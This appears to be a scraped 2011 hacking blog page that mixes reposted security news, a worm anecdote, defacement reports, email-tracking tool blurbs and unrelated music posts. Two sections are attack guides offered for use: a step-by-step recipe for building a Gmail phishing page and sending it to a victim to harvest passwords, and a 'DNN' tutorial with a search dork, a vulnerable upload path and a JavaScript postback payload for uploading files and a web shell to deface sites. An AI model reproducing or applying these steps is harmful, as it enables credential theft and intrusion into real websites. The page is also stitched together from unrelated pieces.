8/28/11

XSS vulnerability in Bing.com Maps




One of the Security Researcher "Juan Sacco (runlvl)" - Insecurity Research Labs expose the Cross Site vulnerability (XSS) in Bing.com Search Engine. BING.COM is prone to a XSS vulnerability because the application failsto properly perform adequate boundary checks on user-supplied data.An attacker can exploit this issue to execute arbitrary code in thevictim's browser.

Details :
The reflected XSS vulnerability is a variant of a cross-site scriptingflaw: it occurs when the data provided by the attacker is exectued bythe browser, and then displayed on "normal" pages returned to otherusers in the course of regular browsing, without proper HTML escaping. Aclassic example of this is with online message boards where users areallowed to post HTML formatted messages for other users to read.
Vulnerable Link

Cyber war against Israel have taken very dangerous turn


Cyber war against Israel have taken very dangerous turn

The Cyber war between Egypt and Israel have taken very dangerous turn by setting normal internet users as target for botnet attacks. Since week ago some Egyptian hackers attacked so many Israeli's gov communities and organizations on the internet. Israeli prime minister Netanyahus for example. But yet it wasn't very scary attacks level , as it was far from the normal computer users.

In Sudden escalation for the attack level , an Egyptian group launched computer worm which infected about 50000 personal computer in Israel and united states. Despite of my virtual machine security level , it was also infected by the same worm. I (Reuben Rayner) didn't notice that am infected till the attackers launched an exe file which viewed message in the full screen mode.

Quits of the attackers message they started with the word "Anti-Zionism" 
"If u can see this message this mean that u either from israel orfrom USA > both sucks
your stupid zionist soliders passed through the Egyptian borders and killed 3 soldiers and that's not good for u.
now our army became 79999997 instead of 80000000 , they all ready to kick ur fat asses :)"
it seem that it also about the border problem between Egypt and Israel
"our strike is just the beginning , u can say it's a simple bullet , but the nuclear strike is comming soon :)
this is not your only fate , so don't be sad , this fate is waiting thousands of zionist users
watch this pic : http://adf.ly/2R8A1"
Threatening that they are more attacks against Zionists and attaching a picture of their own bot network.
"Striked By : sTrIk3r, i-Hmx , H311 C0D3 & K4rar
shouts to all elite hackers at sec4ever.com , alm3refh.com and 1337s.cc
now let Our Worm talk to u about herself for seconds . . ."

Names and Arabic sites and yet they seem to be funny enough to let them worm talk to the user > me
you can read the full message via the picture above, but what make this attack unique?? Ok , have you viewed Israel gov sites yesterday? Try pinging mossad.gov.il for example
The pinging result
C:\>ping mossad.gov.il -ttl
Pinging mossad.gov.il [147.237.72.71] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Request timed out.

What's the point??
If the attackers used the same massive bots to attack sensitive gov sites , this will probably cause a disaster.
If they did it and dumped the banking accounts of thousands and thousands of users they got , this will also cause disaster.

Little analysis for the worm
I (Reuben Rayner) am trying to get a copy of this worm now to give detailed analysis but it's using a unique technique to attack spread over computers
- usb spread.
- inject itself within executable files
- injecting malicious html codes through out user's pc
- it's always trying to use the fake msn account in my virtual machine to send malicious links
- sending the antivirus update requests to fake server addresses so you will always think that ur AV is updated , but actually it isn't.
- disabling firewall software > comodo in my vpc
other techniques still unknown to me

While surfing through internet I (Reuben Rayner) found some topics asking for help about that worm. All asking the same question , what should I (Reuben Rayner) do? You have to format your C drive and re-install windows. Once installation is finished don't open any exe file , juts copy firewall software from the internet. Install it and block any request from exe files to modify registry or connecting to internet. Download Avira , install it and update it now it's able to detect this malware. Scan your computer and remove any infected file , now you are safe :)

CSLSecurity Hacked by TeaMp0isoN



CSL Security hacked by TeaMp0isoN. CSL Security claim to be "New LulzSec" type hacking Group. Their goal is to show that most of the important websites are vulnerable,They claim to show that any system can be compromised, nothing is secure. They Hit Sites, generally hack the Govt sites.
Hacked site : http://www.cslsecurity.com/
Mirror of hack : http://zone-h.org/mirror/id/14799769

CSLSecurity Hacked by TeaMp0isoN



CSL Security hacked by TeaMp0isoN. CSL Security claim to be "New LulzSec" type hacking Group. Their goal is to show that most of the important websites are vulnerable,They claim to show that any system can be compromised, nothing is secure. They Hit Sites, generally hack the Govt sites.
Hacked site : http://www.cslsecurity.com/
Mirror of hack : http://zone-h.org/mirror/id/14799769

Rankmyhack got hacked by HaxOr



Rankmyhack.com got hacked by "HaxOr". Rankmyhack.com is a website, lets hackers submit and rate each others hacks in order to determine the world's best hacker. According to the New York Times, the site has picked up at least 700 members since it launched at the end of July. The bounty section of this site was created in an attempt to focus the abilities of talented hackers against political and government forces that need to be put back in line.

Hax0r hack and upload a text file on server as shown. Message written in page "Greetz to all members of Team INTRA...Secure your shit!". We (THN) check "Upload" folder on FTP of same site, which list all image files uploaded there.
One of the Image file with name "jodete.jpg" is supposed to be PHP SHELL uploaded by Hacker for Hacking attempt.
UPDATE :  Rankmyhack.com Server also got hacked by T H E N 4 7 7 : http://pastebin.com/bq8xJPMn

Apple Website Hacked by HodLuM




If you enjoyed The Hacker News, Make sure you subscribe to our WEB SITE ARVINDHACKINGTOOLS.BLOGSPOT.COM. Stay Updated about latest Security threats, Hacking threads & IT Issues from all over the world.!
Apple Website Hacked by HodLuM
One of the Apple Sub-Domain claimed to be Defaced By HodLuM as shown above. The Deface Link is just an IMAGE uploaded to Apple domain. Hacker use "N00BZ" word for all Hacker including Anonymous , Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. AOL Postmaster Website was also got hacked by HODLUM some months before.

Netcraft Anti Phishing Toolbar



Netcraft has created this privacy statement covering its web sites in order to demonstrate our commitment to privacy.
 System Requirements
  • Internet Explorer on Windows 2000/XP.
  • FireFox 1.0 or later on all platforms (Windows/Mac/Linux)

Publish By:- ARvind gAUR

How to Create Own Phishing page



 1.     First of all download Super Phisher  here
 2.       Now  open "Super Phisher.exe" file to get something like:


3. Now, in "URL of Login Page", enter http://www.gmail. Com or any other social  networking site u want to hack..
4. At "Name of Log File" write password.txt or whatever you like. This is the place where any  typed id and password are stored.

5. At "Name of PHP File"  type login.php

6. At “ site to redirect to”  you can write your phishing page https://gmail.com

7. Finally click Build Phisher, your gmail account will get  generated  at  output  folder.
8.Upload all  phisher files to any free webhost site like:
9. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Gmail account using your sent  Phisher.

10. Once they  log in to his  Gmail account using Phisher, all their  typed email and password is stored in "password.txt".

8/27/11



Online Email Tracer: Email Tracer is a tool to track email sender’s identity. It analyzes the email header and gives the complete details of the sender like IP address, which is key point to find the culprit and the route followed by the mail, the Mail Server, details of Service Provider etc. Email Tracer traces up to Internet Service Provider level only. Further tracing can be done with the help of ISP and law enforcement agencies. The message-id will be useful for analyzing the mail logs at ISP.


Read Notify: ReadNotify is the original tracking service of its kind, and remains the most powerful and reliable email and document tracking service in the world today. In short - ReadNotify tells you when your tracked emails and documents are opened / re-opened / forwarded and so much more.





Didtheyreadit: DidTheyReadIt is a leader in providing a low cost, easy to use email tracking service. In the last few years we have been featured internationally in newspapers, magazines, and television and our services are used by some of the largest corporations in the world. We are based in Houston, Texas and have branch offices throughout the world.


PoltiteMail: PoliteMail is software tools for Microsoft Outlook and Exchange. Our PoliteMail for Outlook client software adds the tracking tools and marketing features you want in Outlook and connects to the PoliteMail Server, which collects the tracking data 24/7.


8/19/11

DNN Full HACKINGTutorial



DNN Full Tutorial
Code:
Dork:inurl:"/portals/0"
suppose you get these sites
Code:
http://www.wittur.se/
Here is now the exploit
Code:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
simply copy the exploit url to the site end
Code:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx


after selecting the third option just reply the whole url by this script
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.



now u can upload jpg,gif,png,pdf,ppt file format, try the exploit for more file formats..

n yeh u can upload the shell too on the website

u need a aspx or asp shell to upload the site, now how to upload a asp or aspx shell to the site. PM me for this..

after upload the aspx or asp shell u can deface the whole website 

Jay Sean - Dance With You

Jay Sean - Dance With You

wicked street freestyle party by jay sean , rishi rich & Juggy D , song in punjabi and english , released in 2003 september shot in Feltham Shopping Centre.

 Jay Sean - In X-FaCtOr  In India     



This one has to be one of the best episodes ever. UK's biggest R&B sensation Jay Sean pays a surprise visit to the stage of X Factor India. He performs on his hits 'Dance With You' and '2012'. Sonu Nigam joins the stage with him and performs on 'Kal Ho Na Ho' on Jay's beatboxing. He wishes all the contestant luck and bids goodbye. Another exciting episode comes to an end and leaves everyone waiting for the next installment which is a Disco Special.

X FACTOR INDIA -- is the big daddy of all music shows in scale and size. With versions in 24 countries and a unique format that gives contestants the chance to showcase their talent regardless of the age.
A singing show with a unique format that gives everyone a chance to showcase their talent. Open to all citizens of India over the age of 16, the auditions will be divided into 3 categories, viz. 16-25 years, 25 & above and individual groups. Participants that make through the final selection will then be divided into three groups with each group headed by a mentor. Of this lot, the top 12 will be selected to participate in the Galas and prove their mettle to the entire nation
Hosted by the multi-talented Aditya Narayan & judged by the stalwarts of the Indian Film Industry Sonu Nigam, Shreya Ghoshal & Sanjay Leela Bhansali, the show premiered on 29th May 2011 on Sony Entertainment Television.
Sonu Nigam: He is a highly successful actor, singer and anchor. Having spun numbers like Mera Rang De Basanti Chola, Dil Dooba and Kal Ho Na Ho among numerous others, this versatile performer has won many accolades and is now all set to mesmerize the nation with his role as a judge in X FACTOR INDIA .
Sanjay Leela Bhansali: Needless to say, one of India's greatest film makers having moved hearts right from his first film, Khamoshi -- The Musical to Hum Dil Chuke Sanam to Guzaarish, this producer, writer, director and recently turned musician has received several accolades for his creativity abilities. As one of the judges for X FACTOR INDIA' Sanjay has vowed to pick only the best.
Shreya Ghoshal: For Shreya life has come full circle, from a being a contestant on a reality show to being the judge on the biggest music reality show on Indian television. This gifted singer's first film "Devdas" not only saw her getting a Filmfare 'RD. Burman Award for New Music Talent' but also the 'best female playback singer' award. After lending her voice in more than 180 films and receiving four National Film Awards, she is all set to win hearts in her new avatar as a judge in X FACTOR INDIA.
HaCkInG Is NoT A CrImE..iT's Our Passion..:P. Powered by Blogger.

Followers